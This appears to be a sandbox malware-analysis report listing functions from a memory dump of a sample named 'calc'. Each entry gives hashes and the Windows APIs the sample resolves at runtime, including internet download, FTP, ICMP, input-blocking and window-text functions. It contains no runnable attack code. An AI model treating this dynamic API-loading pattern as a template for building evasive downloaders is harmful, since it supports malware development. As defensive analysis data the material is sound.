Opcode ID: 87460ed2882eeec03f62f8abfe9a272826d6655d9327dffbe0991a640beb69e2
Instruction ID: 1973df5bb126482aae2e4e6a8735d8a15de43624a53d5d51aca769ce645b95dc
Opcode Fuzzy Hash: 87460ed2882eeec03f62f8abfe9a272826d6655d9327dffbe0991a640beb69e2
Instruction Fuzzy Hash: 56D0C9B0540702EEDB205FE1C889712B6E8EB54703F208C7BF889D1661E77CC480CA1D

Function 0040D903 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,0040AD7E), ref: 0040D90E
GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 0040D920

Strings

SetLayeredWindowAttributes, xrefs: 0040D91A
user32.dll, xrefs: 0040D909

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SetLayeredWindowAttributes$user32.dll
API String ID: 2574300362-3673630139
Opcode ID: 0b9319c72a3938820b8e29fe754c2ff4bd06b79e130f39b896147091e9f707c9
Instruction ID: d95a0980b9b24fbccb637a881063bc43dac3bd5ace8db47cbba05e6c3ea30a14
Opcode Fuzzy Hash: 0b9319c72a3938820b8e29fe754c2ff4bd06b79e130f39b896147091e9f707c9
Instruction Fuzzy Hash: 22D0C9B4980302EECB205FA1C8897227BE8EB14703F20887BF889E1291D778C448CA5C

Function 0042FD05 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042A928), ref: 0042FD10
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0042FD22

Strings

InternetReadFile, xrefs: 0042FD1C
Wininet.dll, xrefs: 0042FD0B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetReadFile$Wininet.dll
API String ID: 2574300362-924813344
Opcode ID: 0b024437d5a358529518af0740c8c3f3769af86ed8bba1f9015ea3fd8d59a6c0
Instruction ID: 0738d51040bf5b37f2d3baf1b8c1fd70f6f3e5145db968a4aeea1ded9e3f9793
Opcode Fuzzy Hash: 0b024437d5a358529518af0740c8c3f3769af86ed8bba1f9015ea3fd8d59a6c0
Instruction Fuzzy Hash: 1ED0C970651316EEEB205FB1D8497137AF8AB54702F608C7EB48AD1261EBB8D444CA5E

Function 0042FE76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,0042A1CD), ref: 0042FE81
GetProcAddress.KERNEL32(00000000,BlockInput), ref: 0042FE93

Strings

BlockInput, xrefs: 0042FE8D
user32.dll, xrefs: 0042FE7C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: BlockInput$user32.dll
API String ID: 2574300362-2937418566
Opcode ID: 404e9111c6e6801255c94cdd9c4d6e53c8d3ef9f70bd27f46ab3d7b24d408f0c
Instruction ID: 5cf9de07a1d2d069aa2e7b4fdd9df96ea71fdfaea9e6c567f07273b76baa48ce
Opcode Fuzzy Hash: 404e9111c6e6801255c94cdd9c4d6e53c8d3ef9f70bd27f46ab3d7b24d408f0c
Instruction Fuzzy Hash: 23D0C970640303EECB206F65D8897137AF8AB54703F60887BB499D1662D778D444CA2D

Function 0040EE00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0040ED52), ref: 0040EE0B
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EE1D

Strings

GetNativeSystemInfo, xrefs: 0040EE17
kernel32.dll, xrefs: 0040EE06

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 0b96ee1863518c42de66b1f26a690429182ced4a93e9530b1a523ccbf49fe990
Instruction ID: 4ae1193dba9c48cb0c5664eca05f475a23552d859b8bf3b4555ea32bba526360
Opcode Fuzzy Hash: 0b96ee1863518c42de66b1f26a690429182ced4a93e9530b1a523ccbf49fe990
Instruction Fuzzy Hash: 90D09270940706EFCB309F62C88971376A8AB04742F20886EA899A2292D77894448A58

Function 0040EE27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0040EDDC,00000000,0040ED1A,00000000), ref: 0040EE32
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE44

Strings

kernel32.dll, xrefs: 0040EE2D
IsWow64Process, xrefs: 0040EE3E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 1e4c4c52eaf14ae59e37d506b1a8826225f3cb419422225db61ca319c80d633e
Instruction ID: 4d2749d2037bdd5891abe0ff91837f8b9674c2f4ff14754d6a40b5c982573c9e
Opcode Fuzzy Hash: 1e4c4c52eaf14ae59e37d506b1a8826225f3cb419422225db61ca319c80d633e
Instruction Fuzzy Hash: CFD0C9B0540706EECB219F62CC89B1376E8AB10703F248C7BF899E2291D778C444CB5C

Function 0042FEC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FD60,00000000,0042AA4D,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000002,?), ref: 0042FECF
GetProcAddress.KERNEL32(00000000,InternetConnectW), ref: 0042FEE1

Strings

Wininet.dll, xrefs: 0042FECA
InternetConnectW, xrefs: 0042FEDB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetConnectW$Wininet.dll
API String ID: 2574300362-1624158369
Opcode ID: d55e37cb5c0b998d5704e0510165499c229194de1f36175613f9725cb941f9c2
Instruction ID: 6beab622e64ffd3ffafc19c2bb0389d1e9587c3fa6564a3e8a594d243805a38b
Opcode Fuzzy Hash: d55e37cb5c0b998d5704e0510165499c229194de1f36175613f9725cb941f9c2
Instruction Fuzzy Hash: 9CD0C770641302EFC7509F61E849B2376F4BB50713F51887EB486D1161D778C444CA1E

Function 0042FEEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042AF68), ref: 0042FEF6
GetProcAddress.KERNEL32(00000000,FtpGetFileSize), ref: 0042FF08

Strings

FtpGetFileSize, xrefs: 0042FF02
Wininet.dll, xrefs: 0042FEF1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: FtpGetFileSize$Wininet.dll
API String ID: 2574300362-2899565566
Opcode ID: bf1f0fae169dbb848176434d40dda45f633b0226ec4bdb1ab3f46c69e1570896
Instruction ID: 6e2f1a3589dd496c4a574bc58a45a2a8ffee36e7460e454037f1e55863833db7
Opcode Fuzzy Hash: bf1f0fae169dbb848176434d40dda45f633b0226ec4bdb1ab3f46c69e1570896
Instruction Fuzzy Hash: 00D0C970641312EEEB204F61EC897137AF8AB51702F60887BB485D2261E778D444CA1E

Function 0042FE9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA

Strings

InternetOpenW, xrefs: 0042FEB4
Wininet.dll, xrefs: 0042FEA3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetOpenW$Wininet.dll
API String ID: 2574300362-877548236
Opcode ID: 34b87f62cfdf380b8ccbfa36128968db94369e509c6d5735b559491f206b4e66
Instruction ID: 0d5205680ce1cf61959fbead00ef169317bcd9810b75d67f5dafcbe366c6e18d
Opcode Fuzzy Hash: 34b87f62cfdf380b8ccbfa36128968db94369e509c6d5735b559491f206b4e66
Instruction Fuzzy Hash: 3FD0C970641302EECB218F65E849B137AF8AF40707F6088BBB486D1261F778D944CA2E

Function 0042FF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,0042EE02,00000000), ref: 0042FF6B
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0042FF7D

Strings

ICMP.DLL, xrefs: 0042FF66
IcmpCreateFile, xrefs: 0042FF77

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: 448ed7840704bb0c97f5a272b10aeb282cfbf60d1182337d8a215b2e0715e45b
Instruction ID: bf7179da54abc46cd951648f6e6908f67397438e0fda1f0a3b4423561e902304
Opcode Fuzzy Hash: 448ed7840704bb0c97f5a272b10aeb282cfbf60d1182337d8a215b2e0715e45b
Instruction Fuzzy Hash: E6D0C970B84302EADB208F61D94971376E8AB04742FA0887BF486D1250EB78D844CE1D

Function 0042FF12 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042B04C,?,00000000), ref: 0042FF1D
GetProcAddress.KERNEL32(00000000,InternetCrackUrlW), ref: 0042FF2F

Strings

InternetCrackUrlW, xrefs: 0042FF29
Wininet.dll, xrefs: 0042FF18

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetCrackUrlW$Wininet.dll
API String ID: 2574300362-347599637
Opcode ID: e9d49308bcfc6781801864efc9e89498d0e92c33abf54bec09941dec22f01ff2
Instruction ID: 5ff5592ba0a425792e03ce43277024437636c0b2cb541ece127d41c82a77f44a
Opcode Fuzzy Hash: e9d49308bcfc6781801864efc9e89498d0e92c33abf54bec09941dec22f01ff2
Instruction Fuzzy Hash: 30D0C770651302EECB104F71D849B13B6F46B61703F50887BB445D1191E77CD454CB1E

Function 0042FF39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0042E1E0), ref: 0042FF44
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0042FF56

Strings

GlobalMemoryStatusEx, xrefs: 0042FF50
kernel32.dll, xrefs: 0042FF3F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 2574300362-2840702992
Opcode ID: 94cea872562736caa615b9a265b0d0f8118fda40b181ffbbb9525ecd0ba62313
Instruction ID: 8a938186144a47b9956747278f1c4d40b4f4c98024efec04d135bd045ace993e
Opcode Fuzzy Hash: 94cea872562736caa615b9a265b0d0f8118fda40b181ffbbb9525ecd0ba62313
Instruction Fuzzy Hash: 95D0C770644702DEC7105F61D94971377E4AB41742F51887BF45AD13A6D778D448C71D

Function 0042FFD5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FCCB,00479E08,0042A8BD,0047A12C,00479E08,00000000,?,00479E08,?,?,?,?,?,00401261,00000001), ref: 0042FFE0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0042FFF2

Strings

InternetCloseHandle, xrefs: 0042FFEC
Wininet.dll, xrefs: 0042FFDB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetCloseHandle$Wininet.dll
API String ID: 2574300362-2671934185
Opcode ID: da7a4e695b75a524f41592d6218b4e95730e5d58a7a56d9fa048062187c07d0c
Instruction ID: 5f85477641528b649044d5b180d8833ed898c78725f852d861f6adab056468e1
Opcode Fuzzy Hash: da7a4e695b75a524f41592d6218b4e95730e5d58a7a56d9fa048062187c07d0c
Instruction Fuzzy Hash: 9BD0C970645303EEDB204F61D8497137AF8AB51706F608D7BB585D12A0EBB8C854CA1E

Function 0042FFFC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FD4A,00000003,0042ABAC,?,00000000,00000000,00000000,?,00000000,00000002,00000000,00000002,?,?,?), ref: 00430007
GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 00430019

Strings

InternetOpenUrlW, xrefs: 00430013
Wininet.dll, xrefs: 00430002

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetOpenUrlW$Wininet.dll
API String ID: 2574300362-1201172734
Opcode ID: 141d25df4eb92c3a49c7ef6aa85ce327791cac5de94b58be8ec3f37f1331c0b2
Instruction ID: 5a4cbaa502e8c8f1ab29dba965d814a9a2628aecf7a0e04567c8e0bf69dd12b8
Opcode Fuzzy Hash: 141d25df4eb92c3a49c7ef6aa85ce327791cac5de94b58be8ec3f37f1331c0b2
Instruction Fuzzy Hash: 5DD0C970641306FECB209FA1D8597137AFCAB48702F20D96EB486D1262E778D840CE1E

Function 0042FF87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,0042EE92,00000000,00000101,?,00000000), ref: 0042FF92
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0042FFA4

Strings

IcmpCloseHandle, xrefs: 0042FF9E
ICMP.DLL, xrefs: 0042FF8D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: 0028ad27e4753e6a7c9841a6e405e2d916431237add922c083a50b67822741ce
Instruction ID: 4ad17662a18769c5ca722e306ae6d49d0565d4f0a8ec4b6744b8708eb146cff8
Opcode Fuzzy Hash: 0028ad27e4753e6a7c9841a6e405e2d916431237add922c083a50b67822741ce
Instruction Fuzzy Hash: 70D0C970644302EFDB208F61D949B1B76E8AB00702F608C7BF487D2254EB78D494DA1D

Function 0042FFAE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,0042EE9F,00000000,00000101,?,00000000), ref: 0042FFB9
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0042FFCB

Strings

ICMP.DLL, xrefs: 0042FFB4
IcmpSendEcho, xrefs: 0042FFC5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: 5c744039cc312e32fa68ca1fd5a98d9c5030e6167d7fc7856f0a5a5cb21ae833
Instruction ID: 2527bdccc761a368fe9d4b677af4fa62b435770a335d842e50a769aa11b7ee6a
Opcode Fuzzy Hash: 5c744039cc312e32fa68ca1fd5a98d9c5030e6167d7fc7856f0a5a5cb21ae833
Instruction Fuzzy Hash: 2BD0C970644302EADB208F61DA4971376E8AB00706F61887BF486D1A90EB78D444CB1D

Function 00403AB0 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000000,?,00000400), ref: 00403AE7
GetWindowTextW.USER32(00000000,?,00000400), ref: 00403B25
CharUpperBuffW.USER32(?,00000000), ref: 00403B42
GetWindowTextW.USER32(00000000,?,00000400), ref: 00403BB0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
